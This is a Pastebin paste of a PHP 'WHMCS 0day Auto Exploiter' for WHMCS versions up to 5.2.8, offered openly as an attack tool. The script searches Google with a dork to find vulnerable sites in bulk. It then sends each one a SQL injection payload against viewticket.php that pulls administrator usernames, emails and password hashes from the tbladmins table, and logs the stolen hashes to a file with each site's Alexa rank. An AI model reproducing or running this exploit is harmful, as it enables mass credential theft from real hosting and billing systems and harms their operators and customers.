Advertisement
RokiAdhytama

WHMCS Auto Exploit by g00n

Nov 19th, 2019
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.58 KB | None | 0 0
  1. <?php
  2. /*
  3. *****************************************************
  4. WHMCS 0day Auto Exploiter <= 5.2.8
  5. Coded by g00n - Skype: t3hg00n
  6. wwww.xploiter.net
  7. *****************************************************
  8. */
  9.  
  10. set_time_limit(0);
  11. ini_set('memory_limit', '64M');
  12. header('Content-Type: text/html; charset=UTF-8');
  13. function letItBy(){ ob_flush(); flush(); }
  14. function getAlexa($url)
  15. {
  16. $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  17. $rank1 = $xml->SD[1];
  18. if($rank1)
  19. $rank = $rank1->POPULARITY->attributes()->TEXT;
  20. else
  21. $rank = 0;
  22. return $rank;
  23. }
  24.  
  25. function google_that($query, $page=1)
  26. {
  27. $resultPerPage=8;
  28. $start = $page*$resultPerPage;
  29. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  30. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  31. if(isset($resultFromGoogle['responseStatus'])) {
  32. if($resultFromGoogle['responseStatus'] != '200') return false;
  33. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  34. else return $resultFromGoogle['responseData']['results'];
  35. }
  36. else
  37. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  38. }
  39.  
  40. function http_get($url, $safemode = false){
  41. if($safemode === true) sleep(1);
  42. $im = curl_init($url);
  43. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  44. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  45. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  46. curl_setopt($im, CURLOPT_HEADER, 0);
  47. return curl_exec($im);
  48. curl_close();
  49. }
  50.  
  51. function check_vuln($url) {
  52. $url = dirname($url) . '/viewticket.php';
  53. $url = str_replace("/admin","",$url);
  54.  
  55. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  56. $curl_connection = curl_init($url);
  57. if($curl_connection != false) {
  58. curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  59. curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  60. curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  61. curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  62. curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  63. curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  64. $source = curl_exec($curl_connection);
  65. preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  66. if($infoz[0]) {
  67. return $infoz[0];
  68. }
  69. else
  70. return "Fail!";
  71. }
  72. else
  73. return "Fail!";
  74. }
  75. ?>
  76. <html>
  77. <head>
  78. <title>WHMCS Auto Xploiter - by g00n</title>
  79. </head>
  80. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  81.  
  82. <STYLE>
  83. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  84. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  85. body {
  86. font-family: Tahoma
  87. }
  88. tr {
  89. BORDER: dashed 1px #333;
  90. color: #FFF;
  91. }
  92. td {
  93. BORDER: dashed 1px #333;
  94. color: #FFF;
  95. }
  96. .table1 {
  97. BORDER: 0px Black;
  98. BACKGROUND-COLOR: Black;
  99. color: #FFF;
  100. }
  101. .td1 {
  102. BORDER: 0px;
  103. BORDER-COLOR: #333333;
  104. font: 7pt Verdana;
  105. color: Green;
  106. }
  107. .tr1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. color: #FFF;
  111. }
  112. table {
  113. BORDER: dashed 1px #333;
  114. BORDER-COLOR: #333333;
  115. BACKGROUND-COLOR: Black;
  116. color: #FFF;
  117. }
  118. input {
  119. border : dashed 1px;
  120. border-color : #333;
  121. BACKGROUND-COLOR: Black;
  122. font: 8pt Verdana;
  123. color: Red;
  124. }
  125. select {
  126. BORDER-RIGHT: Black 1px solid;
  127. BORDER-TOP: #DF0000 1px solid;
  128. BORDER-LEFT: #DF0000 1px solid;
  129. BORDER-BOTTOM: Black 1px solid;
  130. BORDER-color: #FFF;
  131. BACKGROUND-COLOR: Black;
  132. font: 8pt Verdana;
  133. color: Red;
  134. }
  135. submit {
  136. BORDER: buttonhighlight 2px outset;
  137. BACKGROUND-COLOR: Black;
  138. width: 30%;
  139. color: #FFF;
  140. }
  141. textarea {
  142. border : dashed 1px #333;
  143. BACKGROUND-COLOR: Black;
  144. font: Fixedsys bold;
  145. color: #999;
  146. }
  147. BODY {
  148. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  149. margin: 1px;
  150. color: Red;
  151. background-color: Black;
  152. }
  153. .main {
  154. margin : -287px 0px 0px -490px;
  155. BORDER: dashed 1px #333;
  156. BORDER-COLOR: #333333;
  157. }
  158. .tt {
  159. background-color: Black;
  160. }
  161.  
  162. A:link {
  163. COLOR: White; TEXT-DECORATION: none
  164. }
  165. A:visited {
  166. COLOR: White; TEXT-DECORATION: none
  167. }
  168. A:hover {
  169. color: Red; TEXT-DECORATION: none
  170. }
  171. A:active {
  172. color: Red; TEXT-DECORATION: none
  173. }
  174.  
  175. #result{margin:10px;}
  176. #result span{display:block;}
  177. #result .Y{background-color:green;}
  178. #result .X{background-color:red;}
  179. </STYLE>
  180. <script language=\'javascript\'>
  181. function hide_div(id)
  182. {
  183. document.getElementById(id).style.display = \'none\';
  184. document.cookie=id+\'=0;\';
  185. }
  186. function show_div(id)
  187. {
  188. document.getElementById(id).style.display = \'block\';
  189. document.cookie=id+\'=1;\';
  190. }
  191. function change_divst(id)
  192. {
  193. if (document.getElementById(id).style.display == \'none\')
  194. show_div(id);
  195. else
  196. hide_div(id);
  197. }
  198. </script>
  199. </td></table></tr>
  200. <br>
  201. <br>
  202. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  203. <style>
  204. body {
  205. font-family: 'Audiowide', serif;
  206. font-size: 30px;
  207.  
  208. }
  209. </style>
  210. </head>
  211.  
  212. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  213. <center>
  214. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  215. <br>
  216. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  217. </font>
  218. <br><br>
  219.  
  220. <table border=1 bordercolor=red>
  221. <tr>
  222. <td width="700">
  223. <br />
  224. <center>
  225. <form method="post">
  226. Google Dork: &nbsp;&nbsp;
  227. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  228. &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  229. </form>
  230. <?php
  231. if(isset($_POST['dork']{0})) {
  232. $file = fopen("WMCS-Hashes.txt","a");
  233. echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
  234. letItBy();
  235. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  236. $googleResult = google_that($_POST['dork'], $googlePage);
  237. if(!$googleResult) {
  238. echo 'Finished scanning.';
  239. fclose($file);
  240. break;
  241. }
  242.  
  243. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  244. $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  245. $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  246. if($result != "Fail!") {
  247. $hashes = "";
  248. foreach ($result as $record) {
  249. $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  250. }
  251. $sep = "========================================================\n";
  252. $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  253. fwrite($file,$data);
  254. echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  255. echo '<span class="Y">';
  256. echo "<pre>" . $data . "</pre></span><br />";
  257.  
  258. }
  259. else {
  260. echo '<span class="X">';
  261. echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  262. echo "</span>\n<br />";
  263. }
  264. letItBy();
  265. }
  266. }
  267. echo '</div>';
  268. }
  269. ?>
  270. </center>
  271. </td>
  272. </table>
  273. <br /><br />
  274. <font face="Audiowide" color="red" size="2">
  275. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  276. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  277. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  278. </font>
  279.  
  280. </center>
  281. </body>
  282. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement